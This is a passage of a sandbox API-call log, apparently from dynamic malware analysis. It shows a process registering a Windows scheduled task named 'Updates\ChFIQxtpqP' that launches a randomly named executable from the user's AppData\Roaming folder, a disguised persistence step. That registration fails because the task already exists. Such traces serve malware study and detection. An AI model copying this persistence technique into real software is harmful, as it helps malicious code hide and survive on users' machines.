_BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.272] lstrlenW (lpString="|sd|") returned 4 [0195.272] lstrlenW (lpString="|XML|") returned 5 [0195.273] SetLastError (dwErrCode=0x490) [0195.273] lstrlenW (lpString="ed") returned 2 [0195.273] lstrlenW (lpString="ed") returned 2 [0195.273] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.273] lstrlenW (lpString="XML") returned 3 [0195.273] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.273] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|ed|") returned 4 [0195.273] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.273] lstrlenW (lpString="|ed|") returned 4 [0195.273] lstrlenW (lpString="|XML|") returned 5 [0195.273] SetLastError (dwErrCode=0x490) [0195.273] lstrlenW (lpString="it") returned 2 [0195.273] lstrlenW (lpString="it") returned 2 [0195.273] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.273] lstrlenW (lpString="XML") returned 3 [0195.273] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.273] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|it|") returned 4 [0195.273] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.273] lstrlenW (lpString="|it|") returned 4 [0195.273] lstrlenW (lpString="|XML|") returned 5 [0195.273] SetLastError (dwErrCode=0x490) [0195.273] lstrlenW (lpString="et") returned 2 [0195.273] lstrlenW (lpString="et") returned 2 [0195.273] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.273] lstrlenW (lpString="XML") returned 3 [0195.273] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.273] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|et|") returned 4 [0195.273] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.273] lstrlenW (lpString="|et|") returned 4 [0195.273] lstrlenW (lpString="|XML|") returned 5 [0195.273] SetLastError (dwErrCode=0x490) [0195.273] lstrlenW (lpString="k") returned 1 [0195.273] lstrlenW (lpString="k") returned 1 [0195.273] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.274] lstrlenW (lpString="XML") returned 3 [0195.274] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.274] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|k|") returned 3 [0195.274] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.274] lstrlenW (lpString="|k|") returned 3 [0195.274] lstrlenW (lpString="|XML|") returned 5 [0195.274] SetLastError (dwErrCode=0x490) [0195.274] lstrlenW (lpString="du") returned 2 [0195.274] lstrlenW (lpString="du") returned 2 [0195.274] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.274] lstrlenW (lpString="XML") returned 3 [0195.274] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.274] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|du|") returned 4 [0195.274] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.274] lstrlenW (lpString="|du|") returned 4 [0195.274] lstrlenW (lpString="|XML|") returned 5 [0195.274] SetLastError (dwErrCode=0x490) [0195.274] lstrlenW (lpString="ri") returned 2 [0195.274] lstrlenW (lpString="ri") returned 2 [0195.274] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.274] lstrlenW (lpString="XML") returned 3 [0195.274] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.274] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|ri|") returned 4 [0195.274] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.274] lstrlenW (lpString="|ri|") returned 4 [0195.274] lstrlenW (lpString="|XML|") returned 5 [0195.274] SetLastError (dwErrCode=0x490) [0195.274] lstrlenW (lpString="z") returned 1 [0195.274] lstrlenW (lpString="z") returned 1 [0195.274] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.274] lstrlenW (lpString="XML") returned 3 [0195.274] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.274] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|z|") returned 3 [0195.275] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.275] lstrlenW (lpString="|z|") returned 3 [0195.275] lstrlenW (lpString="|XML|") returned 5 [0195.275] SetLastError (dwErrCode=0x490) [0195.275] lstrlenW (lpString="f") returned 1 [0195.275] lstrlenW (lpString="f") returned 1 [0195.275] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.275] lstrlenW (lpString="XML") returned 3 [0195.275] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.275] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|f|") returned 3 [0195.275] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.275] lstrlenW (lpString="|f|") returned 3 [0195.275] lstrlenW (lpString="|XML|") returned 5 [0195.275] SetLastError (dwErrCode=0x490) [0195.275] lstrlenW (lpString="v1") returned 2 [0195.275] lstrlenW (lpString="v1") returned 2 [0195.275] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.275] lstrlenW (lpString="XML") returned 3 [0195.275] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.275] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|v1|") returned 4 [0195.275] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.275] lstrlenW (lpString="|v1|") returned 4 [0195.275] lstrlenW (lpString="|XML|") returned 5 [0195.275] SetLastError (dwErrCode=0x490) [0195.275] lstrlenW (lpString="xml") returned 3 [0195.275] lstrlenW (lpString="xml") returned 3 [0195.275] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.275] lstrlenW (lpString="XML") returned 3 [0195.275] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.275] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|xml|") returned 5 [0195.275] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.275] lstrlenW (lpString="|xml|") returned 5 [0195.275] lstrlenW (lpString="|XML|") returned 5 [0195.275] StrStrIW (lpFirst="|xml|", lpSrch="|XML|") returned="|xml|" [0195.276] SetLastError (dwErrCode=0x0) [0195.276] SetLastError (dwErrCode=0x0) [0195.276] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp") returned 60 [0195.276] lstrlenW (lpString="-/") returned 2 [0195.276] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0195.276] SetLastError (dwErrCode=0x490) [0195.276] SetLastError (dwErrCode=0x490) [0195.276] SetLastError (dwErrCode=0x0) [0195.276] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp") returned 60 [0195.276] StrChrIW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp", wMatch=0x3a) returned=":\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp" [0195.276] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp") returned 60 [0195.276] _memicmp (_Buf1=0x434d28, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.276] _memicmp (_Buf1=0x434d58, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.276] SetLastError (dwErrCode=0x7a) [0195.276] SetLastError (dwErrCode=0x0) [0195.276] SetLastError (dwErrCode=0x0) [0195.276] lstrlenW (lpString="C") returned 1 [0195.276] SetLastError (dwErrCode=0x490) [0195.276] SetLastError (dwErrCode=0x0) [0195.276] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp") returned 60 [0195.276] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp") returned 60 [0195.276] GetProcessHeap () returned 0x420000 [0195.276] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x7a) returned 0x436a20 [0195.276] SetLastError (dwErrCode=0x0) [0195.276] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp") returned 60 [0195.276] SetLastError (dwErrCode=0x0) [0195.276] GetProcessHeap () returned 0x420000 [0195.276] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x1fc) returned 0x436aa8 [0195.277] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0195.292] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0195.301] CoCreateInstance (in: rclsid=0x39230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x3920fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x1dd3d4 | out: ppv=0x1dd3d4*=0x683e40) returned 0x0 [0195.309] TaskScheduler:ITaskService:Connect (This=0x683e40, serverName=0x1dd344*(varType=0x8, wReserved1=0x0, wReserved2=0xd3b8, wReserved3=0x1d, varVal1=0x0, varVal2=0x1ddc90), user=0x1dd354*(varType=0x0, wReserved1=0x1d, wReserved2=0xd3dc, wReserved3=0x1d, varVal1=0x76779cde, varVal2=0x1ddc90), domain=0x1dd364*(varType=0x0, wReserved1=0x0, wReserved2=0x1f0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), password=0x1dd374*(varType=0x0, wReserved1=0x0, wReserved2=0x9c39, wReserved3=0x7677, varVal1=0x70, varVal2=0x1dde10)) returned 0x0 [0195.314] TaskScheduler:IUnknown:AddRef (This=0x683e40) returned 0x2 [0195.314] TaskScheduler:ITaskService:GetFolder (in: This=0x683e40, Path=0x0, ppFolder=0x1dd478 | out: ppFolder=0x1dd478*=0x683ea8) returned 0x0 [0195.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tmp40f5.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x108 [0195.319] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x1dcd68 | out: lpFileSize=0x1dcd68*=1685) returned 1 [0195.319] ReadFile (in: hFile=0x108, lpBuffer=0x1dcd70, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x1dcd78, lpOverlapped=0x0 | out: lpBuffer=0x1dcd70*, lpNumberOfBytesRead=0x1dcd78*=0x2, lpOverlapped=0x0) returned 1 [0195.319] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.319] malloc (_Size=0x696) returned 0x682710 [0195.320] ReadFile (in: hFile=0x108, lpBuffer=0x682710, nNumberOfBytesToRead=0x696, lpNumberOfBytesRead=0x1dcd78, lpOverlapped=0x0 | out: lpBuffer=0x682710*, lpNumberOfBytesRead=0x1dcd78*=0x695, lpOverlapped=0x0) returned 1 [0195.320] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x682710, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1686 [0195.320] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x682710, cbMultiByte=-1, lpWideCharStr=0x4456dc, cchWideChar=1686 | out: lpWideCharStr="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n") returned 1686 [0195.320] SysStringLen (param_1="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n") returned 0x695 [0195.320] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n", pbstrResult=0x1dcd18 | out: pbstrResult=0x1dcd18) returned 0x0 [0195.320] free (_Block=0x682710) [0195.320] CloseHandle (hObject=0x108) returned 1 [0195.320] lstrlenW (lpString="") returned 0 [0195.321] malloc (_Size=0xc) returned 0x6813f0 [0195.321] SysStringLen (param_1="") returned 0x0 [0195.321] free (_Block=0x6813f0) [0195.321] lstrlenW (lpString="") returned 0 [0195.321] ITaskFolder:RegisterTask (in: This=0x683ea8, Path="Updates\\ChFIQxtpqP", XmlText="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n", flags=2, UserId=0x1dcd54*(varType=0x8, wReserved1=0x0, wReserved2=0x4230, wReserved3=0x44, varVal1="", varVal2=0x444230), password=0x1dcd64*(varType=0x0, wReserved1=0x44, wReserved2=0x0, wReserved3=0x0, varVal1=0x1dcdec, varVal2=0x76ac7526), LogonType=0, sddl=0x1dcd78*(varType=0x0, wReserved1=0x44, wReserved2=0x4230, wReserved3=0x44, varVal1=0x0, varVal2=0x0), ppTask=0x1dcdd8 | out: ppTask=0x1dcdd8*=0x0) returned 0x800700b7 [0195.335] SetLastError (dwErrCode=0x800700b7) [0195.335] GetLastError () returned 0x800700b7 [0195.335] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x800700b7, dwLanguageId=0x0, lpBuffer=0x1dcd6c, nSize=0x0, Arguments=0x0 | out: lpBuffer="丘D쵼\x1d鿹:㺮瓌폨\x1d锵9⥀皁\x01\x01땧铼\x01") returned 0x35 [0195.336] GetLastError () returned 0x800700b7 [0195.336] lstrlenW (lpString="Cannot create a file when that file already exists.\r\n") returned 53 [0195.336] GetProcessHeap () returned 0x420000 [0195.336] GetProcessHeap () returned 0x420000 [0195.336] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x433d20) returned 1 [0195.336] GetProcessHeap () returned 0x420000 [0195.336] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x433d20) returned 0x2 [0195.336] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x433d20 | out: hHeap=0x420000) returned 1 [0195.336] GetProcessHeap () returned 0x420000 [0195.336] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x6c) returned 0x4448d0 [0195.336] SetLastError (dwErrCode=0x800700b7) [0195.336] GetProcessHeap () returned 0x420000 [0195.336] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435758 [0195.336] _memicmp (_Buf1=0x434cc8, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.336] LoadStringW (in: hInstance=0x0, uID=0x1389, lpBuffer=0x436718, cchBufferMax=256 | out: lpBuffer="ERROR:") returned 0x6 [0195.336] lstrlenW (lpString="ERROR:") returned 6 [0195.336] GetProcessHeap () returned 0x420000 [0195.336] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0xe) returned 0x441080 [0195.336] GetProcessHeap () returned 0x420000 [0195.336] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x4410f8 [0195.336] _memicmp (_Buf1=0x4410f8, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.336] GetProcessHeap () returned 0x420000 [0195.336] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x1000) returned 0x447148 [0195.337] _vsnwprintf (in: _Buffer=0x447148, _BufferCount=0x7ff, _Format="%s ", _ArgList=0x1dcd70 | out: _Buffer="ERROR: ") returned 7 [0195.337] _fileno (_File=0x76812940) returned 2 [0195.337] _errno () returned 0x6807d8 [0195.337] _get_osfhandle (_FileHandle=2) returned 0xb [0195.337] _errno () returned 0x6807d8 [0195.337] GetFileType (hFile=0xb) returned 0x2 [0195.337] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0195.337] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1dcd08 | out: lpMode=0x1dcd08) returned 1 [0195.338] __iob_func () returned 0x76812900 [0195.338] __iob_func () returned 0x76812900 [0195.338] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0195.338] lstrlenW (lpString="ERROR: ") returned 7 [0195.338] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x447148*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1dcd30, lpReserved=0x0 | out: lpBuffer=0x447148*, lpNumberOfCharsWritten=0x1dcd30*=0x7) returned 1 [0195.338] _fileno (_File=0x76812940) returned 2 [0195.338] _errno () returned 0x6807d8 [0195.338] _get_osfhandle (_FileHandle=2) returned 0xb [0195.338] _errno () returned 0x6807d8 [0195.338] GetFileType (hFile=0xb) returned 0x2 [0195.339] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0195.339] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1dcd34 | out: lpMode=0x1dcd34) returned 1 [0195.341] __iob_func () returned 0x76812900 [0195.341] __iob_func () returned 0x76812900 [0195.341] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0195.341] lstrlenW (lpString="Cannot create a file when that file already exists.\r\n") returned 53 [0195.341] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4448d0*, nNumberOfCharsToWrite=0x35, lpNumberOfCharsWritten=0x1dcd5c, lpReserved=0x0 | out: lpBuffer=0x4448d0*, lpNumberOfCharsWritten=0x1dcd5c*=0x35) returned 1 [0195.342] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x1dcde0 | out: pperrinfo=0x1dcde0*=0x0) returned 0x1 [0195.342] TaskScheduler:IUnknown:Release (This=0x683ea8) returned 0x0 [0195.342] TaskScheduler:IUnknown:Release (This=0x683e40) returned 0x1 [0195.342] lstrlenW (lpString="") returned 0 [0195.342] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp") returned 60 [0195.342] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0195.342] GetProcessHeap () returned 0x420000 [0195.342] GetProcessHeap () returned 0x420000 [0195.342] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x436aa8) returned 1 [0195.342] GetProcessHeap () returned 0x420000 [0195.342] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x436aa8) returned 0x1fc [0195.342] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x436aa8 | out: hHeap=0x420000) returned 1 [0195.342] GetProcessHeap () returned 0x420000 [0195.342] GetProcessHeap () returned 0x420000 [0195.342] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x436a20) returned 1 [0195.342] GetProcessHeap () returned 0x420000 [0195.343] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x436a20) returned 0x7a [0195.343] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x436a20 | out: hHeap=0x420000) returned 1 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435398) returned 1 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435398) returned 0x16 [0195.343] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435398 | out: hHeap=0x420000) returned 1 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434bd8) returned 1 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434bd8) returned 0x10 [0195.343] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434bd8 | out: hHeap=0x420000) returned 1 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4353b8) returned 1 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4353b8) returned 0x14 [0195.343] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4353b8 | out: hHeap=0x420000) returned 1 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x436670) returned 1 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x436670) returned 0xa0 [0195.343] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x436670 | out: hHeap=0x420000) returned 1 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434cb0) returned 1 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434cb0) returned 0x10 [0195.343] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434cb0 | out: hHeap=0x420000) returned 1 [0195.343] GetProcessHeap () returned 0x420000 [0195.343] GetProcessHeap () returned 0x420000 [0195.344] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435298) returned 1 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435298) returned 0x14 [0195.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435298 | out: hHeap=0x420000) returned 1 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x436998) returned 1 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x436998) returned 0x7e [0195.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x436998 | out: hHeap=0x420000) returned 1 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434d58) returned 1 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434d58) returned 0x10 [0195.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434d58 | out: hHeap=0x420000) returned 1 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435258) returned 1 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435258) returned 0x14 [0195.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435258 | out: hHeap=0x420000) returned 1 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434d40) returned 1 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434d40) returned 0xc [0195.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434d40 | out: hHeap=0x420000) returned 1 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] HeapValidate (hHeap=0x420000, dwFlags=0x0, 